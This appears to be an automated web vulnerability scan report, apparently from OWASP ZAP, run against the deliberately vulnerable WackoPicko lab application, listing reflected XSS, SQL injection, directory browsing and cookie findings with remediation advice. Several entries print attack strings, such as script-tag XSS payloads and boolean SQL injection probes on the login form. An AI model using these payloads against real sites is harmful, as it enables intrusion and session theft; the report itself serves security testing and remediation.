When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning) Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have their account hijacked (cookie theft), their browser redirected to another location, or be shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone, allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form which, when posted to the vulnerable site, will mount the attack. A malicious form is typically used when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Once the malicious link is clicked or the malicious form is submitted, the XSS payload is echoed back, interpreted by the user's browser and executed. Another technique for sending almost arbitrary requests (GET and POST) is to use an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it is stored for a period of time. Favorite targets include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site or link (e.g. an attacker site or a malicious link sent via email); they need only view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
Host
Attack
</p><script>alert(1);</script><p>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning) Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have their account hijacked (cookie theft), their browser redirected to another location, or be shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone, allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form which, when posted to the vulnerable site, will mount the attack. A malicious form is typically used when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Once the malicious link is clicked or the malicious form is submitted, the XSS payload is echoed back, interpreted by the user's browser and executed. Another technique for sending almost arbitrary requests (GET and POST) is to use an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it is stored for a period of time. Favorite targets include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site or link (e.g. an attacker site or a malicious link sent via email); they need only view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
Parameter
query
Attack
"><script>alert(1);</script>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Suspicious) Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have their account hijacked (cookie theft), their browser redirected to another location, or be shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone, allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form which, when posted to the vulnerable site, will mount the attack. A malicious form is typically used when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Once the malicious link is clicked or the malicious form is submitted, the XSS payload is echoed back, interpreted by the user's browser and executed. Another technique for sending almost arbitrary requests (GET and POST) is to use an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it is stored for a period of time. Favorite targets include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site or link (e.g. an attacker site or a malicious link sent via email); they need only view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
username
Attack
'"<script>alert(1);</script>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning) SQL Injection

Description

SQL injection may be possible

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
username
Attack
ZAP' AND '1'='1' --
Other information
The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' AND '1'='2' -- ]. The parameter value being modified was NOT stripped from the HTML output for the purposes of the comparison. Data was returned for the original parameter. The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter.

Solution

Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.

Reference

https://www.owasp.org/index.php/Top_10_2010-A1

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

CWE Id

89

WASC Id

19

High (Warning) SQL Injection

Description

SQL injection may be possible

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
username
Attack
ZAP' AND '1'='1' --
Other information
The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' AND '1'='2' -- ]. The parameter value being modified was stripped from the HTML output for the purposes of the comparison. Data was returned for the original parameter. The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter.

Solution

Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'.

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.

Reference

https://www.owasp.org/index.php/Top_10_2010-A1

https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

CWE Id

89

WASC Id

19

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/css/blueprint/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/pictures/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/doggie/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/flowers/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/house/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/toga/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/upload/waterfall/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Medium (Warning) Directory browsing

Description

It is possible to view the directory listing. Directory listing may reveal hidden scripts, include files, backup source files, etc., which can be accessed to read sensitive information.

URL
http://192.168.91.131/WackoPicko/users/
Attack
Parent Directory

Solution

Disable directory browsing. If this is required, make sure the listed files do not induce risks.

Reference

For IIS, turn off directory browsing.

For Apache, use the 'Options -Indexes' directive to disable indexes in a directory, or via .htaccess:

. http://httpd.apache.org/docs/mod/core.html#options

. http://alamo.satlug.org/pipermail/satlug/2002-February/000053.html

. or create a default index.html for each directory.

CWE Id

548

WASC Id

48

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/users/home.php

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Informational (Warning) X-Frame-Options header not set

Description

The X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

URL
http://192.168.91.131/WackoPicko/users/home.php

Solution

Most modern Web browsers support the X-Frame-Options HTTP header; ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY.

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning) X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.

URL
http://192.168.91.131/WackoPicko/action.swf?directory=%2FWackoPicko%2F

Solution

This check is specific to Internet Explorer 8 and Google Chrome. Ensure each page sets a Content-Type header and the X-Content-Type-Options header if the Content-Type header is unknown.

Reference

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/
Parameter
PHPSESSID
Attack
3to91o8a8k8e5kr8ob87umq081; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/home.php
Parameter
PHPSESSID
Attack
v4s19tq25v45ffl2m1oln5chc1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/upload.php
Parameter
PHPSESSID
Attack
h125dko1e4254cmu5p2lft1dm1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/recent.php
Parameter
PHPSESSID
Attack
2qg2mi763dgvu7qfphcj8uvck3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
PHPSESSID
Attack
id7o978shnrd5ddfjm1cbcjuc5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/login.php
Parameter
PHPSESSID
Attack
qbf5uslrv6qehbdn22vhvul8d4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/register.php
Parameter
PHPSESSID
Attack
kagmsnnuhuo38usierjgbje4g0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/users/sample.php?userid=1
Parameter
PHPSESSID
Attack
9at9eje0in752f3jleuslrs446; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php
Parameter
PHPSESSID
Attack
0lig0nccr40asgp8b92i9jtpu7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID
Attack
1ibt4cfue8gtgvqa0ifasroht3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/tos.php
Parameter
PHPSESSID
Attack
jnmmg4lon9hqtdqcj7l5lob4j7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/search.php?query=ZAP
Parameter
PHPSESSID
Attack
j6asp50ige6pbhcgk103ketmp2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=15
Parameter
PHPSESSID
Attack
v6bmrhud1ra09797s5oqe9m9c2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=14
Parameter
PHPSESSID
Attack
v8lsnk91utdobfk2e5t7rogel6; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=13
Parameter
PHPSESSID
Attack
fav8k33bdu53fk4cftmati0006; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/pictures/view.php?picid=12
Parameter
PHPSESSID
Attack
tu8humhbikk81lun726fhhjke2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning) Cookie set without HttpOnly flag

Description

